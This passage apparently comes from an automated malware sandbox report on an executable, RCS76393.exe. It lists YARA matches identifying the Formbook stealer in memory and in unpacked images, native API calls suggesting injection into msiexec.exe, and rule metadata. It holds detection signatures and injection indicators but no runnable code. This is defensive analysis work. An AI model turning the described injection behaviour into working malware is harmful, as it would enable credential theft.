          Source: Yara matchFile source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_004181C0 NtCreateFile,3_2_004181C0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00418270 NtReadFile,3_2_00418270
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_004182F0 NtClose,3_2_004182F0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_004183A0 NtAllocateVirtualMemory,3_2_004183A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041826B NtReadFile,3_2_0041826B
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041839A NtAllocateVirtualMemory,3_2_0041839A
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A398F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_00A398F0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00A39860
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39840 NtDelayExecution,LdrInitializeThunk,3_2_00A39840
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A399A0 NtCreateSection,LdrInitializeThunk,3_2_00A399A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00A39910
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39A20 NtResumeThread,LdrInitializeThunk,3_2_00A39A20
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00A39A00
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39A50 NtCreateFile,LdrInitializeThunk,3_2_00A39A50
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A395D0 NtClose,LdrInitializeThunk,3_2_00A395D0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39540 NtReadFile,LdrInitializeThunk,3_2_00A39540
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A396E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00A396E0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00A39660
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A397A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00A397A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39780 NtMapViewOfSection,LdrInitializeThunk,3_2_00A39780
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39FE0 NtCreateMutant,LdrInitializeThunk,3_2_00A39FE0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39710 NtQueryInformationToken,LdrInitializeThunk,3_2_00A39710
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A398A0 NtWriteVirtualMemory,3_2_00A398A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39820 NtEnumerateKey,3_2_00A39820
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3B040 NtSuspendThread,3_2_00A3B040
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A399D0 NtCreateProcessEx,3_2_00A399D0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39950 NtQueueApcThread,3_2_00A39950
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39A80 NtOpenDirectoryObject,3_2_00A39A80
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39A10 NtQuerySection,3_2_00A39A10
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3A3B0 NtGetContextThread,3_2_00A3A3B0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39B00 NtSetValueKey,3_2_00A39B00
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A395F0 NtQueryInformationFile,3_2_00A395F0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39520 NtWaitForSingleObject,3_2_00A39520
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3AD30 NtSetContextThread,3_2_00A3AD30
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39560 NtWriteFile,3_2_00A39560
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A396D0 NtCreateKey,3_2_00A396D0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39610 NtEnumerateValueKey,3_2_00A39610
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39670 NtQueryInformationProcess,3_2_00A39670
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39650 NtQueryValueKey,3_2_00A39650
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39730 NtQueryVirtualMemory,3_2_00A39730
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3A710 NtOpenProcessToken,3_2_00A3A710
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39760 NtOpenProcess,3_2_00A39760
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39770 NtSetInformationFile,3_2_00A39770
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3A770 NtOpenThread,3_2_00A3A770
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_004181C0 NtCreateFile,3_1_004181C0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_00418270 NtReadFile,3_1_00418270
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_004182F0 NtClose,3_1_004182F0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_004183A0 NtAllocateVirtualMemory,3_1_004183A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_0041826B NtReadFile,3_1_0041826B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9540 NtReadFile,LdrInitializeThunk,7_2_045C9540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C95D0 NtClose,LdrInitializeThunk,7_2_045C95D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9650 NtQueryValueKey,LdrInitializeThunk,7_2_045C9650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_045C9660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C96D0 NtCreateKey,LdrInitializeThunk,7_2_045C96D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_045C96E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9710 NtQueryInformationToken,LdrInitializeThunk,7_2_045C9710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9FE0 NtCreateMutant,LdrInitializeThunk,7_2_045C9FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9780 NtMapViewOfSection,LdrInitializeThunk,7_2_045C9780
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9840 NtDelayExecution,LdrInitializeThunk,7_2_045C9840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_045C9860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_045C9910
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C99A0 NtCreateSection,LdrInitializeThunk,7_2_045C99A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A50 NtCreateFile,LdrInitializeThunk,7_2_045C9A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9560 NtWriteFile,7_2_045C9560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CAD30 NtSetContextThread,7_2_045CAD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9520 NtWaitForSingleObject,7_2_045C9520
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C95F0 NtQueryInformationFile,7_2_045C95F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9670 NtQueryInformationProcess,7_2_045C9670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9610 NtEnumerateValueKey,7_2_045C9610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CA770 NtOpenThread,7_2_045CA770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9770 NtSetInformationFile,7_2_045C9770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9760 NtOpenProcess,7_2_045C9760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CA710 NtOpenProcessToken,7_2_045CA710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9730 NtQueryVirtualMemory,7_2_045C9730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C97A0 NtUnmapViewOfSection,7_2_045C97A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CB040 NtSuspendThread,7_2_045CB040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9820 NtEnumerateKey,7_2_045C9820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C98F0 NtReadVirtualMemory,7_2_045C98F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C98A0 NtWriteVirtualMemory,7_2_045C98A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9950 NtQueueApcThread,7_2_045C9950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C99D0 NtCreateProcessEx,7_2_045C99D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A10 NtQuerySection,7_2_045C9A10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A00 NtProtectVirtualMemory,7_2_045C9A00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A20 NtResumeThread,7_2_045C9A20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A80 NtOpenDirectoryObject,7_2_045C9A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9B00 NtSetValueKey,7_2_045C9B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CA3B0 NtGetContextThread,7_2_045CA3B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B83A0 NtAllocateVirtualMemory,7_2_030B83A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B8270 NtReadFile,7_2_030B8270
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B82F0 NtClose,7_2_030B82F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B81C0 NtCreateFile,7_2_030B81C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B839A NtAllocateVirtualMemory,7_2_030B839A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B826B NtReadFile,7_2_030B826B
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041B8293_2_0041B829
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00408C5B3_2_00408C5B
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00408C603_2_00408C60
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00402D8B3_2_00402D8B
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041C7393_2_0041C739
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A220A03_2_00A220A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC20A83_2_00AC20A8
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0B0903_2_00A0B090
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC28EC3_2_00AC28EC
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB10023_2_00AB1002
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A141203_2_00A14120
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FF9003_2_009FF900
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC22AE3_2_00AC22AE
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2EBB03_2_00A2EBB0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00ABDBD23_2_00ABDBD2
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC2B283_2_00AC2B28
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0841F3_2_00A0841F
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00ABD4663_2_00ABD466
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A225813_2_00A22581
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0D5E03_2_00A0D5E0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC25DD3_2_00AC25DD
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC2D073_2_00AC2D07
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F0D203_2_009F0D20
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC1D553_2_00AC1D55
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC2EF73_2_00AC2EF7
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A16E303_2_00A16E30
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC1FF13_2_00AC1FF1
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_0041B8293_1_0041B829
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_004010303_1_00401030
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464D4667_2_0464D466
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459841F7_2_0459841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04651D557_2_04651D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04652D077_2_04652D07
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04580D207_2_04580D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046525DD7_2_046525DD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459D5E07_2_0459D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B25817_2_045B2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A6E307_2_045A6E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464D6167_2_0464D616
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04652EF77_2_04652EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04651FF17_2_04651FF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046410027_2_04641002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046528EC7_2_046528EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459B0907_2_0459B090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046520A87_2_046520A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A07_2_045B20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458F9007_2_0458F900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A41207_2_045A4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046522AE7_2_046522AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04652B287_2_04652B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464DBD27_2_0464DBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BEBB07_2_045BEBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BB8297_2_030BB829
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BC7397_2_030BC739
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A2FB07_2_030A2FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A2D8B7_2_030A2D8B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A2D907_2_030A2D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A8C5B7_2_030A8C5B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A8C607_2_030A8C60
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: String function: 009FB150 appears 35 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0458B150 appears 35 times
          Source: RCS76393.exe, 00000003.00000002.363023409.0000000000D8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs RCS76393.exe
          Source: RCS76393.exe, 00000003.00000002.362641926.0000000000AEF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RCS76393.exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: RCS76393.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
